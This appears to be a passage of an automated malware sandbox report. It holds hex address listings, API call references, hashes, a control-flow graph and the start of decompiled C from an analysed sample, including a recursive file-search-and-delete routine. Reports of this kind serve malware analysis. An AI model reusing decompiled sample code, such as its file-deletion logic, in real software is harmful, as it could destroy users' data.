                                                                                                                                                                                                                            0x687e21dd
                                                                                                                                                                                                                            0x687e21e1
                                                                                                                                                                                                                            0x687e21f5
                                                                                                                                                                                                                            0x687e21f5
                                                                                                                                                                                                                            0x687e21f8
                                                                                                                                                                                                                            0x687e21fc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e21fe
                                                                                                                                                                                                                            0x687e2202
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2204
                                                                                                                                                                                                                            0x687e220b
                                                                                                                                                                                                                            0x687e220b
                                                                                                                                                                                                                            0x687e2211
                                                                                                                                                                                                                            0x687e2214
                                                                                                                                                                                                                            0x687e2230
                                                                                                                                                                                                                            0x687e2216
                                                                                                                                                                                                                            0x687e221f
                                                                                                                                                                                                                            0x687e2222
                                                                                                                                                                                                                            0x687e2222
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2214
                                                                                                                                                                                                                            0x687e21e3
                                                                                                                                                                                                                            0x687e21e6
                                                                                                                                                                                                                            0x687e21ea
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e21ec
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e21ec
                                                                                                                                                                                                                            0x687e21d5
                                                                                                                                                                                                                            0x687e21d8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e21d8
                                                                                                                                                                                                                            0x687e1dfe
                                                                                                                                                                                                                            0x687e1dfe
                                                                                                                                                                                                                            0x687e1dff
                                                                                                                                                                                                                            0x687e1f49
                                                                                                                                                                                                                            0x687e1f49
                                                                                                                                                                                                                            0x687e1f50
                                                                                                                                                                                                                            0x687e1f53
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1f60
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e214b
                                                                                                                                                                                                                            0x687e214e
                                                                                                                                                                                                                            0x687e2151
                                                                                                                                                                                                                            0x687e2151
                                                                                                                                                                                                                            0x687e2152
                                                                                                                                                                                                                            0x687e2153
                                                                                                                                                                                                                            0x687e2156
                                                                                                                                                                                                                            0x687e2159
                                                                                                                                                                                                                            0x687e215c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e215e
                                                                                                                                                                                                                            0x687e215e
                                                                                                                                                                                                                            0x687e2162
                                                                                                                                                                                                                            0x687e217a
                                                                                                                                                                                                                            0x687e217d
                                                                                                                                                                                                                            0x687e2181
                                                                                                                                                                                                                            0x687e2187
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2187
                                                                                                                                                                                                                            0x687e2164
                                                                                                                                                                                                                            0x687e2164
                                                                                                                                                                                                                            0x687e2167
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2169
                                                                                                                                                                                                                            0x687e216c
                                                                                                                                                                                                                            0x687e216e
                                                                                                                                                                                                                            0x687e216f
                                                                                                                                                                                                                            0x687e216f
                                                                                                                                                                                                                            0x687e216f
                                                                                                                                                                                                                            0x687e2170
                                                                                                                                                                                                                            0x687e2173
                                                                                                                                                                                                                            0x687e2176
                                                                                                                                                                                                                            0x687e2177
                                                                                                                                                                                                                            0x687e2151
                                                                                                                                                                                                                            0x687e2152
                                                                                                                                                                                                                            0x687e2153
                                                                                                                                                                                                                            0x687e2156
                                                                                                                                                                                                                            0x687e2159
                                                                                                                                                                                                                            0x687e215c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e215c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1fa7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1fb3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1f9a
                                                                                                                                                                                                                            0x687e1f9e
                                                                                                                                                                                                                            0x687e1fa2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e211c
                                                                                                                                                                                                                            0x687e2120
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2126
                                                                                                                                                                                                                            0x687e212f
                                                                                                                                                                                                                            0x687e2136
                                                                                                                                                                                                                            0x687e213e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2083
                                                                                                                                                                                                                            0x687e2083
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1fbc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e21a6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e208b
                                                                                                                                                                                                                            0x687e208d
                                                                                                                                                                                                                            0x687e208d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2196
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e219a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e21a2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20d3
                                                                                                                                                                                                                            0x687e20d5
                                                                                                                                                                                                                            0x687e20d5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e209d
                                                                                                                                                                                                                            0x687e209f
                                                                                                                                                                                                                            0x687e209f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20af
                                                                                                                                                                                                                            0x687e20b1
                                                                                                                                                                                                                            0x687e20b1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20e1
                                                                                                                                                                                                                            0x687e20e3
                                                                                                                                                                                                                            0x687e20e3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20ba
                                                                                                                                                                                                                            0x687e20bc
                                                                                                                                                                                                                            0x687e20bc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20c1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e219e
                                                                                                                                                                                                                            0x687e21a8
                                                                                                                                                                                                                            0x687e21a8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20ec
                                                                                                                                                                                                                            0x687e20f0
                                                                                                                                                                                                                            0x687e20f5
                                                                                                                                                                                                                            0x687e20f8
                                                                                                                                                                                                                            0x687e20f9
                                                                                                                                                                                                                            0x687e20fc
                                                                                                                                                                                                                            0x687e2102
                                                                                                                                                                                                                            0x687e2102
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e218e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20c5
                                                                                                                                                                                                                            0x687e20c7
                                                                                                                                                                                                                            0x687e20c7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1fc3
                                                                                                                                                                                                                            0x687e1fc3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20da
                                                                                                                                                                                                                            0x687e20dc
                                                                                                                                                                                                                            0x687e20dc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1f67
                                                                                                                                                                                                                            0x687e1f6d
                                                                                                                                                                                                                            0x687e1f70
                                                                                                                                                                                                                            0x687e1f72
                                                                                                                                                                                                                            0x687e1f72
                                                                                                                                                                                                                            0x687e1f75
                                                                                                                                                                                                                            0x687e1f79
                                                                                                                                                                                                                            0x687e1f86
                                                                                                                                                                                                                            0x687e1f88
                                                                                                                                                                                                                            0x687e1f8e
                                                                                                                                                                                                                            0x687e1f8e
                                                                                                                                                                                                                            0x687e1f8e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e208e
                                                                                                                                                                                                                            0x687e208e
                                                                                                                                                                                                                            0x687e2090
                                                                                                                                                                                                                            0x687e2097
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20d6
                                                                                                                                                                                                                            0x687e20d6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20a0
                                                                                                                                                                                                                            0x687e20a0
                                                                                                                                                                                                                            0x687e20a2
                                                                                                                                                                                                                            0x687e20a9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20b2
                                                                                                                                                                                                                            0x687e20b2
                                                                                                                                                                                                                            0x687e20b4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20e4
                                                                                                                                                                                                                            0x687e20e4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20bd
                                                                                                                                                                                                                            0x687e20bd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e210a
                                                                                                                                                                                                                            0x687e210e
                                                                                                                                                                                                                            0x687e2113
                                                                                                                                                                                                                            0x687e2116
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20c8
                                                                                                                                                                                                                            0x687e20c8
                                                                                                                                                                                                                            0x687e20cb
                                                                                                                                                                                                                            0x687e20cd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e20dd
                                                                                                                                                                                                                            0x687e20dd
                                                                                                                                                                                                                            0x687e20e6
                                                                                                                                                                                                                            0x687e20e6
                                                                                                                                                                                                                            0x687e1fc5
                                                                                                                                                                                                                            0x687e1fc5
                                                                                                                                                                                                                            0x687e1fc8
                                                                                                                                                                                                                            0x687e1fcf
                                                                                                                                                                                                                            0x687e1fd1
                                                                                                                                                                                                                            0x687e1fd3
                                                                                                                                                                                                                            0x687e1fda
                                                                                                                                                                                                                            0x687e1fdd
                                                                                                                                                                                                                            0x687e1fe2
                                                                                                                                                                                                                            0x687e1fe4
                                                                                                                                                                                                                            0x687e1fe6
                                                                                                                                                                                                                            0x687e1fea
                                                                                                                                                                                                                            0x687e1ff0
                                                                                                                                                                                                                            0x687e1ff6
                                                                                                                                                                                                                            0x687e1ff6
                                                                                                                                                                                                                            0x687e1ff8
                                                                                                                                                                                                                            0x687e1ff8
                                                                                                                                                                                                                            0x687e1ff9
                                                                                                                                                                                                                            0x687e1ff9
                                                                                                                                                                                                                            0x687e1ffd
                                                                                                                                                                                                                            0x687e2003
                                                                                                                                                                                                                            0x687e2005
                                                                                                                                                                                                                            0x687e2009
                                                                                                                                                                                                                            0x687e200e
                                                                                                                                                                                                                            0x687e200e
                                                                                                                                                                                                                            0x687e2010
                                                                                                                                                                                                                            0x687e2010
                                                                                                                                                                                                                            0x687e2013
                                                                                                                                                                                                                            0x687e2016
                                                                                                                                                                                                                            0x687e201f
                                                                                                                                                                                                                            0x687e2025
                                                                                                                                                                                                                            0x687e2028
                                                                                                                                                                                                                            0x687e2028
                                                                                                                                                                                                                            0x687e202a
                                                                                                                                                                                                                            0x687e202d
                                                                                                                                                                                                                            0x687e2033
                                                                                                                                                                                                                            0x687e2039
                                                                                                                                                                                                                            0x687e2039
                                                                                                                                                                                                                            0x687e203b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2041
                                                                                                                                                                                                                            0x687e2041
                                                                                                                                                                                                                            0x687e2045
                                                                                                                                                                                                                            0x687e204c
                                                                                                                                                                                                                            0x687e2070
                                                                                                                                                                                                                            0x687e2070
                                                                                                                                                                                                                            0x687e2074
                                                                                                                                                                                                                            0x687e2076
                                                                                                                                                                                                                            0x687e2079
                                                                                                                                                                                                                            0x687e2079
                                                                                                                                                                                                                            0x687e207c
                                                                                                                                                                                                                            0x687e207c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2074
                                                                                                                                                                                                                            0x687e2051
                                                                                                                                                                                                                            0x687e2054
                                                                                                                                                                                                                            0x687e2054
                                                                                                                                                                                                                            0x687e205b
                                                                                                                                                                                                                            0x687e205d
                                                                                                                                                                                                                            0x687e2060
                                                                                                                                                                                                                            0x687e2067
                                                                                                                                                                                                                            0x687e2068
                                                                                                                                                                                                                            0x687e206e
                                                                                                                                                                                                                            0x687e206e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e206e
                                                                                                                                                                                                                            0x687e2062
                                                                                                                                                                                                                            0x687e2065
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2065
                                                                                                                                                                                                                            0x687e1ff2
                                                                                                                                                                                                                            0x687e1ff4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1f60
                                                                                                                                                                                                                            0x687e1e05
                                                                                                                                                                                                                            0x687e1e05
                                                                                                                                                                                                                            0x687e1e06
                                                                                                                                                                                                                            0x687e1f46
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1f46
                                                                                                                                                                                                                            0x687e1e0c
                                                                                                                                                                                                                            0x687e1e0d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1e13
                                                                                                                                                                                                                            0x687e1e16
                                                                                                                                                                                                                            0x687e1f0b
                                                                                                                                                                                                                            0x687e1f0b
                                                                                                                                                                                                                            0x687e1f0e
                                                                                                                                                                                                                            0x687e1f23
                                                                                                                                                                                                                            0x687e1f25
                                                                                                                                                                                                                            0x687e1f25
                                                                                                                                                                                                                            0x687e1f26
                                                                                                                                                                                                                            0x687e1f29
                                                                                                                                                                                                                            0x687e1f2c
                                                                                                                                                                                                                            0x687e1f38
                                                                                                                                                                                                                            0x687e1f38
                                                                                                                                                                                                                            0x687e1f38
                                                                                                                                                                                                                            0x687e1f2e
                                                                                                                                                                                                                            0x687e1f2e
                                                                                                                                                                                                                            0x687e1f2e
                                                                                                                                                                                                                            0x687e1f3e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1f3e
                                                                                                                                                                                                                            0x687e1f10
                                                                                                                                                                                                                            0x687e1f10
                                                                                                                                                                                                                            0x687e1f11
                                                                                                                                                                                                                            0x687e1f1f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1f1f
                                                                                                                                                                                                                            0x687e1f14
                                                                                                                                                                                                                            0x687e1f15
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1f1b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1f1b
                                                                                                                                                                                                                            0x687e1e1c
                                                                                                                                                                                                                            0x687e1f07
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1f07
                                                                                                                                                                                                                            0x687e1e22
                                                                                                                                                                                                                            0x687e1e22
                                                                                                                                                                                                                            0x687e1e25
                                                                                                                                                                                                                            0x687e1e4e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1e4e
                                                                                                                                                                                                                            0x687e1e27
                                                                                                                                                                                                                            0x687e1e27
                                                                                                                                                                                                                            0x687e1e2a
                                                                                                                                                                                                                            0x687e1e44
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1e44
                                                                                                                                                                                                                            0x687e1e2c
                                                                                                                                                                                                                            0x687e1e2c
                                                                                                                                                                                                                            0x687e1e2f
                                                                                                                                                                                                                            0x687e1e3e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1e3e
                                                                                                                                                                                                                            0x687e1e32
                                                                                                                                                                                                                            0x687e1e33
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1e35
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1cec
                                                                                                                                                                                                                            0x687e1cec
                                                                                                                                                                                                                            0x687e1cef
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1cef
                                                                                                                                                                                                                            0x687e1ce6
                                                                                                                                                                                                                            0x687e1cd3
                                                                                                                                                                                                                            0x687e1cd8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1cda
                                                                                                                                                                                                                            0x687e1cdd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1cdd
                                                                                                                                                                                                                            0x687e1c6d
                                                                                                                                                                                                                            0x687e1c70
                                                                                                                                                                                                                            0x687e1ca6
                                                                                                                                                                                                                            0x687e1ca9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1caf
                                                                                                                                                                                                                            0x687e1cb1
                                                                                                                                                                                                                            0x687e1cb5
                                                                                                                                                                                                                            0x687e1cbc
                                                                                                                                                                                                                            0x687e1cc3
                                                                                                                                                                                                                            0x687e1cc6
                                                                                                                                                                                                                            0x687e1cc9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1cc9
                                                                                                                                                                                                                            0x687e1ca9
                                                                                                                                                                                                                            0x687e1c72
                                                                                                                                                                                                                            0x687e1c73
                                                                                                                                                                                                                            0x687e1c8e
                                                                                                                                                                                                                            0x687e1c91
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1c97
                                                                                                                                                                                                                            0x687e1c97
                                                                                                                                                                                                                            0x687e1c9e
                                                                                                                                                                                                                            0x687e1ca1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1ca1
                                                                                                                                                                                                                            0x687e1c91
                                                                                                                                                                                                                            0x687e1c78
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1c7e
                                                                                                                                                                                                                            0x687e1c7e
                                                                                                                                                                                                                            0x687e1c85
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1c85
                                                                                                                                                                                                                            0x687e1c78
                                                                                                                                                                                                                            0x687e1e74
                                                                                                                                                                                                                            0x687e1e79
                                                                                                                                                                                                                            0x687e1e7e
                                                                                                                                                                                                                            0x687e1e82
                                                                                                                                                                                                                            0x687e2355
                                                                                                                                                                                                                            0x687e235b
                                                                                                                                                                                                                            0x687e1e94
                                                                                                                                                                                                                            0x687e1e96
                                                                                                                                                                                                                            0x687e1e97
                                                                                                                                                                                                                            0x687e227e
                                                                                                                                                                                                                            0x687e227e
                                                                                                                                                                                                                            0x687e2281
                                                                                                                                                                                                                            0x687e2284
                                                                                                                                                                                                                            0x687e22a1
                                                                                                                                                                                                                            0x687e22a7
                                                                                                                                                                                                                            0x687e22a9
                                                                                                                                                                                                                            0x687e22af
                                                                                                                                                                                                                            0x687e22c6
                                                                                                                                                                                                                            0x687e22c6
                                                                                                                                                                                                                            0x687e22c6
                                                                                                                                                                                                                            0x687e22d3
                                                                                                                                                                                                                            0x687e22d9
                                                                                                                                                                                                                            0x687e22dc
                                                                                                                                                                                                                            0x687e22e2
                                                                                                                                                                                                                            0x687e22e4
                                                                                                                                                                                                                            0x687e22e8
                                                                                                                                                                                                                            0x687e22ea
                                                                                                                                                                                                                            0x687e22f1
                                                                                                                                                                                                                            0x687e22f6
                                                                                                                                                                                                                            0x687e22f9
                                                                                                                                                                                                                            0x687e22fb
                                                                                                                                                                                                                            0x687e2300
                                                                                                                                                                                                                            0x687e2312
                                                                                                                                                                                                                            0x687e2312
                                                                                                                                                                                                                            0x687e2300
                                                                                                                                                                                                                            0x687e22f9
                                                                                                                                                                                                                            0x687e22e8
                                                                                                                                                                                                                            0x687e2318
                                                                                                                                                                                                                            0x687e231b
                                                                                                                                                                                                                            0x687e2325
                                                                                                                                                                                                                            0x687e232d
                                                                                                                                                                                                                            0x687e233a
                                                                                                                                                                                                                            0x687e2340
                                                                                                                                                                                                                            0x687e2343
                                                                                                                                                                                                                            0x687e2273
                                                                                                                                                                                                                            0x687e2273
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2273
                                                                                                                                                                                                                            0x687e2349
                                                                                                                                                                                                                            0x687e234f
                                                                                                                                                                                                                            0x687e234f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2351
                                                                                                                                                                                                                            0x687e2351
                                                                                                                                                                                                                            0x687e2351
                                                                                                                                                                                                                            0x687e2351
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e231d
                                                                                                                                                                                                                            0x687e231d
                                                                                                                                                                                                                            0x687e2323
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2323
                                                                                                                                                                                                                            0x687e231b
                                                                                                                                                                                                                            0x687e22b2
                                                                                                                                                                                                                            0x687e22b8
                                                                                                                                                                                                                            0x687e22ba
                                                                                                                                                                                                                            0x687e22c0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e22c0
                                                                                                                                                                                                                            0x687e2286
                                                                                                                                                                                                                            0x687e228d
                                                                                                                                                                                                                            0x687e2293
                                                                                                                                                                                                                            0x687e2299
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2299
                                                                                                                                                                                                                            0x687e1e9d
                                                                                                                                                                                                                            0x687e1e9e
                                                                                                                                                                                                                            0x687e225d
                                                                                                                                                                                                                            0x687e225d
                                                                                                                                                                                                                            0x687e2263
                                                                                                                                                                                                                            0x687e2266
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e226d
                                                                                                                                                                                                                            0x687e2272
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e2272
                                                                                                                                                                                                                            0x687e1ea5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1eab
                                                                                                                                                                                                                            0x687e1eab
                                                                                                                                                                                                                            0x687e1eb4
                                                                                                                                                                                                                            0x687e1eb9
                                                                                                                                                                                                                            0x687e1ebf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1ec5
                                                                                                                                                                                                                            0x687e1ed2
                                                                                                                                                                                                                            0x687e1ed8
                                                                                                                                                                                                                            0x687e1ee2
                                                                                                                                                                                                                            0x687e1ee8
                                                                                                                                                                                                                            0x687e1ef0
                                                                                                                                                                                                                            0x687e1f00
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1f00

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 687E12BB: GlobalAlloc.KERNEL32(00000040,?,687E12DB,?,687E137F,00000019,687E11CA,-000000A0), ref: 687E12C5
                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 687E1D2D
                                                                                                                                                                                                                            • lstrcpyW.KERNEL32 ref: 687E1D75
                                                                                                                                                                                                                            • lstrcpyW.KERNEL32 ref: 687E1D7F
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E1D92
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E1E74
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E1E79
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E1E7E
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E2068
                                                                                                                                                                                                                            • lstrcpyW.KERNEL32 ref: 687E2222
                                                                                                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000008), ref: 687E22A1
                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(00000008), ref: 687E22B2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 687E230C
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000808), ref: 687E2326
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533258912.00000000687E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533285337.00000000687E4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533299887.00000000687E6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 245916457-0
                                                                                                                                                                                                                            • Opcode ID: 99e70ce56d74754632ea38516d0034836f517b6a4dfaf8d8eed82289ac3f14d4
                                                                                                                                                                                                                            • Instruction ID: 91b938edc63af476060ed72c68423359b6df63f741eca6d0aad99418e188a4c8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99e70ce56d74754632ea38516d0034836f517b6a4dfaf8d8eed82289ac3f14d4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2228C71D5860ADADB10CFA8C68D6EDB7B4FB09316F90453AF1B5E2290D7709A81CB70
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 669 405d74-405d9a call 40603f 672 405db3-405dba 669->672 673 405d9c-405dae DeleteFileW 669->673 675 405dbc-405dbe 672->675 676 405dcd-405ddd call 406668 672->676 674 405f30-405f34 673->674 677 405dc4-405dc7 675->677 678 405ede-405ee3 675->678 682 405dec-405ded call 405f83 676->682 683 405ddf-405dea lstrcatW 676->683 677->676 677->678 678->674 681 405ee5-405ee8 678->681 684 405ef2-405efa call 40699e 681->684 685 405eea-405ef0 681->685 686 405df2-405df6 682->686 683->686 684->674 693 405efc-405f10 call 405f37 call 405d2c 684->693 685->674 689 405e02-405e08 lstrcatW 686->689 690 405df8-405e00 686->690 692 405e0d-405e29 lstrlenW FindFirstFileW 689->692 690->689 690->692 694 405ed3-405ed7 692->694 695 405e2f-405e37 692->695 709 405f12-405f15 693->709 710 405f28-405f2b call 4056ca 693->710 694->678 698 405ed9 694->698 699 405e57-405e6b call 406668 695->699 700 405e39-405e41 695->700 698->678 711 405e82-405e8d call 405d2c 699->711 712 405e6d-405e75 699->712 703 405e43-405e4b 700->703 704 405eb6-405ec6 FindNextFileW 700->704 703->699 705 405e4d-405e55 703->705 704->695 708 405ecc-405ecd FindClose 704->708 705->699 705->704 708->694 709->685 713 405f17-405f26 call 4056ca call 406428 709->713 710->674 722 405eae-405eb1 call 4056ca 711->722 723 405e8f-405e92 711->723 712->704 714 405e77-405e80 call 405d74 712->714 713->674 714->704 722->704 726 405e94-405ea4 call 4056ca call 406428 723->726 727 405ea6-405eac 723->727 726->704 727->704
                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                            			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
